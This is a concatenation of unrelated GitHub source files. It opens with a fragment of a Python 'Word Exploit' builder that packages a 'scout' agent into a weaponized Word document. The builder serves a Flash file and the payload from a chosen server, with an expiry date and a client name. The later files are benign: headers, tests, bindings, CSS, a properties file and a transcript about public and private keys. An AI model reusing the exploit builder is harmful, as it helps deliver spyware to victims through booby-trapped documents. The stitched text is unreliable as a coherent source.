scout_config = copy.deepcopy(baseconfig)
scout_config['general']['pos'] = 'last'
scout_config['valid']['type'] = 'data'
scout_config['valid']['path'] = './{}'.format(exe_random_name)
scout_config['valid']['header[Content-Type]'] = 'application/octet-stream'
scout_config['related'] = {}
write_edn_config(target_directory, exe_random_name, scout_config)
def write_edn_config(target_directory, filename, options):
config = ConfigParser.RawConfigParser()
# Prevent ConfigParser from transforming option names to lowercase
config.optionxform = str
for k in options:
config.add_section(k)
for optk in options[k]:
config.set(k, optk, options[k][optk])
confpath = os.path.join(target_directory, filename + ".ini")
with open(confpath, "w") as fp:
config.write(fp)
print "[*] wrote EDN config file: {}".format(confpath)
# ------- end of build subs -------
# ./build --serveraddr='192.168.0.1' --serverip='192.168.0.1' --basedir='/docs/veryrandomdir/' --outdir='outdir/' --output='output' --t
# ype='worddoc' --expiry='1413469552' --client='CUSTOMER' --type='worddoc' --agent='upload/zip.exe' --document='upload/Doc1.docx'
def main():
random.seed()
# 0] scout_name
# 1] scout input path
# 2] docx input
# 3] docx output path
parser = argparse.ArgumentParser(description='[*] Word Exploit')
parser.add_argument('--outdir', help='exploit destination folder', type=str)
parser.add_argument('--serveraddr', help='server address hostname if available', type=str)
parser.add_argument('--agent', help='input scout', type=str, required=True)
parser.add_argument('--document', help='input docx', type=str, required=True)
parser.add_argument('--output', help='output docx', type=str, required=True)
parser.add_argument('--basedir', help='base directory', type=str, required=True)
parser.add_argument('--expiry', help='expiry date', type=str, required=True)
args, unknown = parser.parse_known_args()
swf_random_name = random_id(12) + '.swf'
exe_random_name = random_id(12) + '.dat'
serveraddr = 'https://' + args.serveraddr
# validate True -> swf served in https, scout https, validate cert
# validate False -> swf served in http, scout https, don't validate cert
validate = True
# extract scout metadata
if platform.system() == 'Windows':
ouch = subprocess.check_output('python ../agentdetect.py --latest "{}"'.format(args.agent), shell=True )
else:
ouch = subprocess.check_output('agentdetect --latest "{}"'.format(args.agent), shell=True )
if ouch.strip() == 'None':
print '[E] scout provided is not up to date'
exit(-1)
scout_data = json.loads(ouch)
if scout_data['type'] != 'scout':
print '[E] executable provided is not a scout'
exit(-1)
scout_name = scout_data['name']
# build the exploit
edn_build(args.outdir, serveraddr, args.basedir, scout_name, args.agent,
args.document, args.output, swf_random_name, exe_random_name, args.expiry, validate)
if __name__ == '__main__':
main()
| {
"pile_set_name": "Github"
} |
27
0 4
0 16
1 5
1 6
2 10
2 6
3 8
6 17
6 19
6 8
7 11
8 12
8 15
9 23
9 25
9 16
11 14
11 15
11 22
12 16
13 16
18 26
20 21
21 23
22 26
23 24
| {
"pile_set_name": "Github"
} |
/* voc 2.1.0 [2019/11/01]. Bootstrapping compiler for address size 8, alignment 8. xrtspaSF */
#ifndef Files__h
#define Files__h
#include "SYSTEM.h"
typedef
struct Files_FileDesc *Files_File;
typedef
struct Files_FileDesc {
INT32 _prvt0;
char _prvt1[568];
} Files_FileDesc;
typedef
struct Files_Rider {
INT32 res;
BOOLEAN eof;
char _prvt0[15];
} Files_Rider;
import INT16 Files_MaxPathLength, Files_MaxNameLength;
import ADDRESS *Files_FileDesc__typ;
import ADDRESS *Files_Rider__typ;
import Files_File Files_Base (Files_Rider *r, ADDRESS *r__typ);
import void Files_ChangeDirectory (CHAR *path, ADDRESS path__len, INT16 *res);
import void Files_Close (Files_File f);
import void Files_Delete (CHAR *name, ADDRESS name__len, INT16 *res);
import void Files_GetDate (Files_File f, INT32 *t, INT32 *d);
import void Files_GetName (Files_File f, CHAR *name, ADDRESS name__len);
import INT32 Files_Length (Files_File f);
import Files_File Files_New (CHAR *name, ADDRESS name__len);
import Files_File Files_Old (CHAR *name, ADDRESS name__len);
import INT32 Files_Pos (Files_Rider *r, ADDRESS *r__typ);
import void Files_Purge (Files_File f);
import void Files_Read (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE *x);
import void Files_ReadBool (Files_Rider *R, ADDRESS *R__typ, BOOLEAN *x);
import void Files_ReadBytes (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE *x, ADDRESS x__len, INT32 n);
import void Files_ReadInt (Files_Rider *R, ADDRESS *R__typ, INT16 *x);
import void Files_ReadLInt (Files_Rider *R, ADDRESS *R__typ, INT32 *x);
import void Files_ReadLReal (Files_Rider *R, ADDRESS *R__typ, LONGREAL *x);
import void Files_ReadLine (Files_Rider *R, ADDRESS *R__typ, CHAR *x, ADDRESS x__len);
import void Files_ReadNum (Files_Rider *R, ADDRESS *R__typ, SYSTEM_BYTE *x, ADDRESS x__len);
import void Files_ReadReal (Files_Rider *R, ADDRESS *R__typ, REAL *x);
import void Files_ReadSet (Files_Rider *R, ADDRESS *R__typ, UINT32 *x);
import void Files_ReadString (Files_Rider *R, ADDRESS *R__typ, CHAR *x, ADDRESS x__len);
import void Files_Register (Files_File f);
import void Files_Rename (CHAR *old, ADDRESS old__len, CHAR *new, ADDRESS new__len, INT16 *res);
import void Files_Set (Files_Rider *r, ADDRESS *r__typ, Files_File f, INT32 pos);
import void Files_SetSearchPath (CHAR *path, ADDRESS path__len);
import void Files_Write (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE x);
import void Files_WriteBool (Files_Rider *R, ADDRESS *R__typ, BOOLEAN x);
import void Files_WriteBytes (Files_Rider *r, ADDRESS *r__typ, SYSTEM_BYTE *x, ADDRESS x__len, INT32 n);
import void Files_WriteInt (Files_Rider *R, ADDRESS *R__typ, INT16 x);
import void Files_WriteLInt (Files_Rider *R, ADDRESS *R__typ, INT32 x);
import void Files_WriteLReal (Files_Rider *R, ADDRESS *R__typ, LONGREAL x);
import void Files_WriteNum (Files_Rider *R, ADDRESS *R__typ, INT64 x);
import void Files_WriteReal (Files_Rider *R, ADDRESS *R__typ, REAL x);
import void Files_WriteSet (Files_Rider *R, ADDRESS *R__typ, UINT32 x);
import void Files_WriteString (Files_Rider *R, ADDRESS *R__typ, CHAR *x, ADDRESS x__len);
import void *Files__init(void);
#endif // Files
| {
"pile_set_name": "Github"
} |
package lager_test
import (
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"testing"
)
func TestLager(t *testing.T) {
RegisterFailHandler(Fail)
RunSpecs(t, "Lager Suite")
}
| {
"pile_set_name": "Github"
} |
<menu
xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
tools:context=".MainActivity">
<item
android:id="@+id/action_settings"
android:title="@string/action_settings"
android:orderInCategory="100"
app:showAsAction="never" />
</menu>
| {
"pile_set_name": "Github"
} |
#ifndef crypto_auth_hmacsha512256_H
#define crypto_auth_hmacsha512256_H
#include <stddef.h>
#include "crypto_auth_hmacsha512.h"
#include "export.h"
#ifdef __cplusplus
# ifdef __GNUC__
# pragma GCC diagnostic ignored "-Wlong-long"
# endif
extern "C" {
#endif
#define crypto_auth_hmacsha512256_BYTES 32U
SODIUM_EXPORT
size_t crypto_auth_hmacsha512256_bytes(void);
#define crypto_auth_hmacsha512256_KEYBYTES 32U
SODIUM_EXPORT
size_t crypto_auth_hmacsha512256_keybytes(void);
SODIUM_EXPORT
int crypto_auth_hmacsha512256(unsigned char *out, const unsigned char *in,
unsigned long long inlen,const unsigned char *k);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_verify(const unsigned char *h,
const unsigned char *in,
unsigned long long inlen,
const unsigned char *k)
__attribute__ ((warn_unused_result));
/* ------------------------------------------------------------------------- */
typedef crypto_auth_hmacsha512_state crypto_auth_hmacsha512256_state;
SODIUM_EXPORT
size_t crypto_auth_hmacsha512256_statebytes(void);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_init(crypto_auth_hmacsha512256_state *state,
const unsigned char *key,
size_t keylen);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_update(crypto_auth_hmacsha512256_state *state,
const unsigned char *in,
unsigned long long inlen);
SODIUM_EXPORT
int crypto_auth_hmacsha512256_final(crypto_auth_hmacsha512256_state *state,
unsigned char *out);
SODIUM_EXPORT
void crypto_auth_hmacsha512256_keygen(unsigned char k[crypto_auth_hmacsha512256_KEYBYTES]);
#ifdef __cplusplus
}
#endif
#endif
| {
"pile_set_name": "Github"
} |
00:01 We've had a chance to play around with Git and take a look at the basic settings on GitHub,
00:04 but in order to go further with our projects,
00:06 we are going to need to setup public and private keys, also known as asymmetric keys.
00:10 Asymmetric keys are computer science concept for encryption and authorization,
00:14 in the next few videos we'll create our public and private keys
00:17 but let's take a look at the basic concepts behind them.
00:20 Let's say you've got a message or a piece of data you want to share with someone
00:23 and you don't want anyone else, even if they intercept it,
00:26 to be able to understand what's in that message,
00:28 you can use a public key as long as the party that you are sending to
00:31 has the appropriate private key that matches with that public key
00:34 and you can use the public key to encrypt that message or data,
00:37 only the party with the private key will be able to decrypt that data.
00:40 A public key can be shared freely, posted on the internet, wherever,
00:43 it doesn't matter if it gets out in the open, in fact, it's better if it's out in the open,
00:47 because then people can use to send you messages as long as you have the private key.
00:51 The private key is the counterpart, it's used not only to decrypt that data
00:55 that is encrypted with the public key,
00:58 but also to sign messages and to validate you are who you say you are
01:01 based on the fact that you own this private key,
01:04 you will never want to share your private key
01:06 and if you ever think that your private key has been compromised
01:09 you are going to want to regenerate both the public and private key.
01:12 Here is how encrypting and decrypting messages with asymmetric keys works,
01:16 let's say you've got a message in plain text,
01:19 you can use the public key to encrypt that message,
01:22 so when you take a look at it, it looks like just a bunch of garbage,
01:25 but inside that supposed garbage lies the message
01:28 that was originally plain text that was encrypted.
01:31 Only the owner of the private key can decrypt the message and extract the plain text.
01:36 This is how one way encryption works, with asymmetric keys,
01:39 the public key does the encryption, the private key does the decryption.
01:43 There is a counter part to this which is if you have the private key
01:46 you can use that to identify yourself and use it as authorization,
01:49 and this is what we need to do on GitHub in order to specify who we are.
01:54 We can use the private key to identify I am who I say I am,
01:57 because I have this private key, and it says the public key is out in the open
02:01 anybody should be able to confirm that you have the valid identity
02:04 based off of a message that you've signed with your private key.
02:07 Let's say you have a message and you use your private key to sign it,
02:10 then anyone can take that message signature and confirm your identity
02:13 based off of the public key, so that's the second bit associated with asymmetric keys.
02:18 The private key can be used for authorization,
02:21 in addition to the public key being used for encryption.
02:24 Just to recap, public keys can be used to encrypt messages and data,
02:28 and they can only be decrypted by that private key;
02:31 a private key can be used for identification,
02:34 I am who I say I am because I own this private key,
02:36 I am the only one who controls it and that be confirmed and validated by the public key,
02:41 so that's a really high level overview of asymmetric keys
02:44 and how public keys are used to encrypt data,
02:47 and private keys are used to sign messages and authorize identity. | {
"pile_set_name": "Github"
} |
include '../../../types.pxi'
from libcpp cimport bool
from libcpp.vector cimport vector
from cython.operator cimport dereference as deref
from quantlib.handle cimport Handle, shared_ptr, static_pointer_cast
from quantlib.math.optimization cimport OptimizationMethod, EndCriteria
from quantlib.indexes.swap_index cimport SwapIndex
from quantlib._defines cimport QL_NULL_REAL
from quantlib.quotes cimport SimpleQuote
from quantlib.time.date cimport Period
from quantlib.time._period cimport Period as QlPeriod
from .swaption_vol_structure cimport SwaptionVolatilityStructure
from . cimport _swaption_vol_cube1 as _svc1
cimport quantlib.indexes._swap_index as _si
from . cimport _swaption_vol_structure as _svs
from ..._vol_term_structure cimport VolatilityTermStructure
cimport quantlib._quote as _qt
cdef class SwaptionVolCube1(SwaptionVolatilityCube):
def __init__(self, SwaptionVolatilityStructure atm_vol_structure not None,
list option_tenors not None,
list swap_tenors not None,
vector[Spread] strike_spreads,
list vol_spreads not None,
SwapIndex swap_index_base not None,
SwapIndex short_swap_index_base not None,
bool vega_weighted_smile_fit,
list parameters_guess not None,
vector[bool] is_parameter_fixed,
bool is_atm_calibrated,
EndCriteria end_criteria not None=EndCriteria.__new__(EndCriteria),
Real max_error_tolerance=QL_NULL_REAL,
OptimizationMethod opt_method not None=OptimizationMethod(),
Real error_accept=QL_NULL_REAL,
bool use_max_error=False,
Size max_guesses=50,
bool backward_flat=False,
Real cutoff_strike=0.0001):
cdef:
Handle[_svs.SwaptionVolatilityStructure] atm_vol_structure_handle = \
Handle[_svs.SwaptionVolatilityStructure](
static_pointer_cast[_svs.SwaptionVolatilityStructure](
atm_vol_structure._thisptr))
vector[QlPeriod] option_tenors_vec
vector[QlPeriod] swap_tenors_vec
Period p
SimpleQuote q
vector[vector[Handle[_qt.Quote]]] vol_spreads_matrix
vector[vector[Handle[_qt.Quote]]] parameters_guess_matrix
list l
for l in vol_spreads:
vol_spreads_matrix.push_back(vector[Handle[_qt.Quote]]())
for q in l:
vol_spreads_matrix.back().push_back(Handle[_qt.Quote](q._thisptr))
for l in parameters_guess:
parameters_guess_matrix.push_back(vector[Handle[_qt.Quote]]())
for q in l:
(parameters_guess_matrix.
back().
push_back(Handle[_qt.Quote](q._thisptr)))
for p in option_tenors:
option_tenors_vec.push_back(deref(p._thisptr))
for p in swap_tenors:
swap_tenors_vec.push_back(deref(p._thisptr))
self._thisptr = shared_ptr[VolatilityTermStructure](
new _svc1.SwaptionVolCube1(
atm_vol_structure_handle,
option_tenors_vec,
swap_tenors_vec,
strike_spreads,
vol_spreads_matrix,
static_pointer_cast[_si.SwapIndex](swap_index_base._thisptr),
static_pointer_cast[_si.SwapIndex](short_swap_index_base._thisptr),
vega_weighted_smile_fit,
parameters_guess_matrix,
is_parameter_fixed,
is_atm_calibrated,
end_criteria._thisptr,
max_error_tolerance,
opt_method._thisptr,
error_accept,
use_max_error,
max_guesses,
backward_flat,
cutoff_strike))
| {
"pile_set_name": "Github"
} |
#
#Thu Nov 28 15:12:32 CST 2019
category.img=\u7F29\u7565\u56FE
appid=\u6587\u7AE0\u7BA1\u7406\u7684\u5E94\u7528id
content.datetime=\u53D1\u5E03\u65F6\u95F4
category.manager.id=\u53D1\u5E03\u7528\u6237id
category.title=\u680F\u76EE\u7BA1\u7406\u540D\u79F0
category.keyword=\u680F\u76EE\u7BA1\u7406\u5173\u952E\u5B57
content.img=\u6587\u7AE0\u7F29\u7565\u56FE
category.path=\u680F\u76EE\u8DEF\u5F84
content.type=\u6587\u7AE0\u7C7B\u578B
category.url=\u5185\u5BB9\u6A21\u677F
dict.id=\u5B57\u5178\u5BF9\u5E94\u7F16\u53F7
content.author=\u6587\u7AE0\u4F5C\u8005
category.parent.id=\u7236\u7C7B\u578B\u7F16\u53F7
category.datetime=\u7C7B\u522B\u53D1\u5E03\u65F6\u95F4
category.flag=\u680F\u76EE\u5C5E\u6027
content.description=\u63CF\u8FF0
content.url=\u6587\u7AE0\u8DF3\u8F6C\u94FE\u63A5\u5730\u5740
category.sort=\u81EA\u5B9A\u4E49\u987A\u5E8F
content.title=\u6587\u7AE0\u6807\u9898
content.category.id=\u6240\u5C5E\u680F\u76EE
id=\u7F16\u53F7
app.id=\u5E94\u7528\u7F16\u53F7
category.list.url=\u5217\u8868\u6A21\u677F
mdiy.model.id=\u680F\u76EE\u7BA1\u7406\u7684\u5185\u5BB9\u6A21\u578Bid
content.source=\u6587\u7AE0\u6765\u6E90
content.display=\u662F\u5426\u663E\u793A
category.type=\u680F\u76EE\u7BA1\u7406\u5C5E\u6027
category.descrip=\u680F\u76EE\u7BA1\u7406\u63CF\u8FF0
content.details=\u6587\u7AE0\u5185\u5BB9
category.id=\u6240\u5C5E\u680F\u76EE
content.sort=\u81EA\u5B9A\u4E49\u987A\u5E8F
category.diy.url=\u81EA\u5B9A\u4E49\u94FE\u63A5
content.keyword=\u5173\u952E\u5B57
templet.file=\u672A\u627E\u5230\u6A21\u677F\u6587\u4EF6
| {
"pile_set_name": "Github"
} |
/*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.prestosql.type;
import io.airlift.slice.Slice;
import io.airlift.slice.Slices;
import io.prestosql.spi.block.Block;
import io.prestosql.spi.block.BlockBuilder;
import io.prestosql.spi.connector.ConnectorSession;
import io.prestosql.spi.type.AbstractVariableWidthType;
import io.prestosql.spi.type.TypeSignature;
public class CodePointsType
extends AbstractVariableWidthType
{
public static final CodePointsType CODE_POINTS = new CodePointsType();
public static final String NAME = "CodePoints";
private CodePointsType()
{
super(new TypeSignature(NAME), int[].class);
}
@Override
public Object getObjectValue(ConnectorSession session, Block block, int position)
{
throw new UnsupportedOperationException();
}
@Override
public void appendTo(Block block, int position, BlockBuilder blockBuilder)
{
throw new UnsupportedOperationException();
}
@Override
public Object getObject(Block block, int position)
{
if (block.isNull(position)) {
return null;
}
Slice slice = block.getSlice(position, 0, block.getSliceLength(position));
int[] codePoints = new int[slice.length() / Integer.BYTES];
slice.getBytes(0, Slices.wrappedIntArray(codePoints));
return codePoints;
}
@Override
public void writeObject(BlockBuilder blockBuilder, Object value)
{
Slice slice = Slices.wrappedIntArray((int[]) value);
blockBuilder.writeBytes(slice, 0, slice.length()).closeEntry();
}
}
| {
"pile_set_name": "Github"
} |
# Copyright (c) 2000-2002 IBM, Inc. and others
# sample code makefile
# Usage:
# - configure, build, install ICU (make install)
# - make sure "icu-config" (in the ICU installed bin directory) is on
# the path
# - do 'make' in this directory
#### definitions
# Name of your target
TARGET=msgfmt
# All object files (C or C++)
OBJECTS=main.o util.o
#### rules
# Load in standard makefile definitions
include ../defs.mk
# the actual rules (this is a simple sample)
include ../rules.mk
| {
"pile_set_name": "Github"
} |
/////////////////////////////////////////////////////////////////////////////
// Name: wx/richtext/richtextindentspage.h
// Purpose: Declares the rich text formatting dialog indent page.
// Author: Julian Smart
// Modified by:
// Created: 10/3/2006 2:28:21 PM
// Copyright: (c) Julian Smart
// Licence: wxWindows licence
/////////////////////////////////////////////////////////////////////////////
#ifndef _RICHTEXTINDENTSPAGE_H_
#define _RICHTEXTINDENTSPAGE_H_
/*!
* Includes
*/
#include "wx/richtext/richtextdialogpage.h"
////@begin includes
#include "wx/statline.h"
////@end includes
/*!
* Forward declarations
*/
////@begin forward declarations
class wxRichTextCtrl;
////@end forward declarations
/*!
* Control identifiers
*/
////@begin control identifiers
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_STYLE wxRESIZE_BORDER|wxTAB_TRAVERSAL
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_TITLE wxEmptyString
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_IDNAME ID_RICHTEXTINDENTSSPACINGPAGE
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_SIZE wxSize(400, 300)
#define SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_POSITION wxDefaultPosition
////@end control identifiers
/*!
* wxRichTextIndentsSpacingPage class declaration
*/
class WXDLLIMPEXP_RICHTEXT wxRichTextIndentsSpacingPage: public wxRichTextDialogPage
{
wxDECLARE_DYNAMIC_CLASS(wxRichTextIndentsSpacingPage);
wxDECLARE_EVENT_TABLE();
DECLARE_HELP_PROVISION()
public:
/// Constructors
wxRichTextIndentsSpacingPage( );
wxRichTextIndentsSpacingPage( wxWindow* parent, wxWindowID id = wxID_ANY, const wxPoint& pos = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_POSITION, const wxSize& size = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_SIZE, long style = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_STYLE );
/// Creation
bool Create( wxWindow* parent, wxWindowID id = wxID_ANY, const wxPoint& pos = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_POSITION, const wxSize& size = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_SIZE, long style = SYMBOL_WXRICHTEXTINDENTSSPACINGPAGE_STYLE );
/// Initialise members
void Init();
/// Creates the controls and sizers
void CreateControls();
/// Transfer data from/to window
virtual bool TransferDataFromWindow() wxOVERRIDE;
virtual bool TransferDataToWindow() wxOVERRIDE;
/// Updates the paragraph preview
void UpdatePreview();
/// Gets the attributes associated with the main formatting dialog
wxRichTextAttr* GetAttributes();
////@begin wxRichTextIndentsSpacingPage event handler declarations
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_LEFT
void OnAlignmentLeftSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_RIGHT
void OnAlignmentRightSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_JUSTIFIED
void OnAlignmentJustifiedSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_CENTRED
void OnAlignmentCentredSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_RADIOBUTTON_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_INDETERMINATE
void OnAlignmentIndeterminateSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT
void OnIndentLeftUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT_FIRST
void OnIndentLeftFirstUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_RIGHT
void OnIndentRightUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_COMBOBOX_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_OUTLINELEVEL
void OnRichtextOutlinelevelSelected( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_BEFORE
void OnSpacingBeforeUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_TEXT_UPDATED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_AFTER
void OnSpacingAfterUpdated( wxCommandEvent& event );
/// wxEVT_COMMAND_COMBOBOX_SELECTED event handler for ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_LINE
void OnSpacingLineSelected( wxCommandEvent& event );
////@end wxRichTextIndentsSpacingPage event handler declarations
////@begin wxRichTextIndentsSpacingPage member function declarations
/// Retrieves bitmap resources
wxBitmap GetBitmapResource( const wxString& name );
/// Retrieves icon resources
wxIcon GetIconResource( const wxString& name );
////@end wxRichTextIndentsSpacingPage member function declarations
/// Should we show tooltips?
static bool ShowToolTips();
////@begin wxRichTextIndentsSpacingPage member variables
wxRadioButton* m_alignmentLeft;
wxRadioButton* m_alignmentRight;
wxRadioButton* m_alignmentJustified;
wxRadioButton* m_alignmentCentred;
wxRadioButton* m_alignmentIndeterminate;
wxTextCtrl* m_indentLeft;
wxTextCtrl* m_indentLeftFirst;
wxTextCtrl* m_indentRight;
wxComboBox* m_outlineLevelCtrl;
wxTextCtrl* m_spacingBefore;
wxTextCtrl* m_spacingAfter;
wxComboBox* m_spacingLine;
wxCheckBox* m_pageBreakCtrl;
wxRichTextCtrl* m_previewCtrl;
/// Control identifiers
enum {
ID_RICHTEXTINDENTSSPACINGPAGE = 10100,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_LEFT = 10102,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_RIGHT = 10110,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_JUSTIFIED = 10111,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_CENTRED = 10112,
ID_RICHTEXTINDENTSSPACINGPAGE_ALIGNMENT_INDETERMINATE = 10101,
ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT = 10103,
ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_LEFT_FIRST = 10104,
ID_RICHTEXTINDENTSSPACINGPAGE_INDENT_RIGHT = 10113,
ID_RICHTEXTINDENTSSPACINGPAGE_OUTLINELEVEL = 10105,
ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_BEFORE = 10114,
ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_AFTER = 10116,
ID_RICHTEXTINDENTSSPACINGPAGE_SPACING_LINE = 10115,
ID_RICHTEXTINDENTSSPACINGPAGE_PAGEBREAK = 10106,
ID_RICHTEXTINDENTSSPACINGPAGE_PREVIEW_CTRL = 10109
};
////@end wxRichTextIndentsSpacingPage member variables
bool m_dontUpdate;
};
#endif
// _RICHTEXTINDENTSPAGE_H_
| {
"pile_set_name": "Github"
} |
#redactor-modal {
position: fixed;
top: 0;
left: 0;
bottom: 0;
right: 0;
overflow-x: hidden;
overflow-y: auto;
z-index: $z-index-modal;
font-family: $base-font-family;
line-height: 24px;
}
.redactor-modal {
position: relative;
margin: 16px auto;
padding: 0;
background: #fff;
box-shadow: 0 0 0 1px rgba(0, 0, 0, .07), 0 2px 15px rgba(80, 80, 80, .25);
border-radius: 3px;
color: #000;
& form {
margin: 0;
padding: 0;
box-sizing: border-box;
}
& input,
& select,
& textarea {
box-sizing: border-box;
display: block;
width: 100%;
font-family: inherit;
font-size: 16px;
height: 40px;
outline: none;
vertical-align: middle;
background-color: #fff;
border: 1px solid #cacfd4;
border-radius: 0.1875em;
box-shadow: none;
padding: 0 .5em;
}
& textarea {
padding: .5em;
height: auto;
line-height: 1.5;
vertical-align: top;
}
& select {
-webkit-appearance: none;
background-image: url('data:image/svg+xml;utf8,<svg xmlns="http://www.w3.org/2000/svg" width="9" height="12" viewBox="0 0 9 12"><path fill="rgba(0, 0, 0, .4);" d="M0.722,4.823L-0.01,4.1,4.134-.01,4.866,0.716Zm7.555,0L9.01,4.1,4.866-.01l-0.732.726ZM0.722,7.177L-0.01,7.9,4.134,12.01l0.732-.726Zm7.555,0L9.01,7.9,4.866,12.01l-0.732-.726Z"/></svg>');
background-repeat: no-repeat;
background-position: right .65em center;
padding-right: 28px;
}
& select[multiple] {
background-image: none;
height: auto;
padding: .5em .75em;
}
& input[type="file"] {
width: auto;
border: none;
padding: 0;
height: auto;
background: none;
box-shadow: none;
display: inline-block;
}
& input[type="radio"],
& input[type="checkbox"] {
display: inline-block;
width: auto;
height: auto;
padding: 0;
vertical-align: middle;
position: relative;
bottom: 0.15rem;
font-size: 115%;
margin-right: 3px;
}
& .form-item {
margin-bottom: 20px;
}
& .form-item:last-child {
margin-bottom: 0;
}
& fieldset {
border: 1px solid rgba(0, 0, 0, .1);
border-radius: 3px;
padding: 16px;
padding-bottom: 20px;
margin-bottom: 20px;
& .form-item {
margin-bottom: 12px;
}
}
& label {
display: block;
color: #555;
margin-bottom: 0.25em;
font-size: 14px;
& .desc,
& .success,
& .error {
text-transform: none;
font-weight: normal;
}
}
& label.checkbox {
font-size: 16px;
line-height: 1.5;
cursor: pointer;
color: inherit;
}
& .form-checkboxes {
& label.checkbox {
display: inline-block;
margin-right: 1em;
}
}
& input,
& textarea,
& select {
&:hover {
outline: none;
background-color: #fff;
border-color: #969fa9;
box-shadow: none;
}
&:focus {
transition: all linear .2s;
outline: none;
background-color: #fff;
border-color: rgba(#007dff, .5);
box-shadow: 0 0 3px rgba(#007dff, .5);
}
&.error {
background-color: rgba(#ff3265, .1);
border: 1px solid lighten(#ff3265, 15%);
&:focus {
border-color: #ff3265;
box-shadow: 0 0 1px #ff3265;
}
}
&.success {
background-color: rgba(#2fc4b6, .1);
border: 1px solid lighten(#2fc4b6, 15%);
&:focus {
border-color: #2fc4b6;
box-shadow: 0 0 1px #2fc4b6;
}
}
&:disabled,
&.disabled {
&,
&:hover {
resize: none;
opacity: .6;
cursor: default;
font-style: italic;
color: rgba(0, 0, 0, .5);
border: 1px solid #cacfd4;
box-shadow: none;
background-color: #fff;
}
}
}
& .req {
position: relative;
top: 1px;
font-weight: bold;
color: #ff3265;
font-size: 110%;
}
& .desc {
color: rgba(#333, .5);
font-size: 12px;
}
& span.desc {
margin-left: 0.25em;
}
& div.desc {
margin-top: 0.25em;
}
& span.success,
& span.error {
font-size: 12px;
margin-left: 0.25em;;
}
& div.desc {
margin-bottom: -0.5em;
}
& .redactor-close {
position: absolute;
top: 16px;
right: 12px;
font-size: 30px;
line-height: 30px;
padding: 0px 4px;
color: #000;
opacity: .3;
cursor: pointer;
&:hover {
opacity: 1;
}
&:before {
content: '\00d7';
}
}
& button {
display: inline-flex;
align-items: center;
text-decoration: none;
text-align: center;
font-family: inherit;
font-size: 15px;
font-weight: 500;
color: #007dff;
background-color: #fff;
border-radius: 3px;
border: 2px solid #007dff;
min-height: 40px;
outline: none;
padding: 0.5em 1.25em;
cursor: pointer;
line-height: 1.2;
vertical-align: middle;
-webkit-appearance: none;
}
& button:hover {
outline: none;
text-decoration: none;
background: none;
color: rgba(#007dff, .6);
border-color: rgba(#007dff, .5);
}
& button.redactor-button-secondary {
border-color: #2a2e34;
color: #2a2e34;
&:hover {
color: rgba(#2a2e34, .6);
border-color: rgba(#2a2e34, .5);
}
}
& button.redactor-button-danger,
& button.redactor-button-unstyled {
background: none;
border-color: transparent;
color: rgba(#2a2e34, .6);
&:hover {
background: none;
border-color: transparent;
color: #ff3265;
text-decoration: underline;
}
}
& .redactor-modal-group:after {
content: "";
display: table;
clear: both;
}
& .redactor-modal-side {
float: left;
width: 30%;
margin-right: 4%;
& img {
max-width: 100%;
height: auto;
display: block;
}
}
& .redactor-modal-area {
float: left;
width: 66%;
}
}
.redactor-modal[dir="rtl"] {
.redactor-close {
left: 12px;
right: auto;
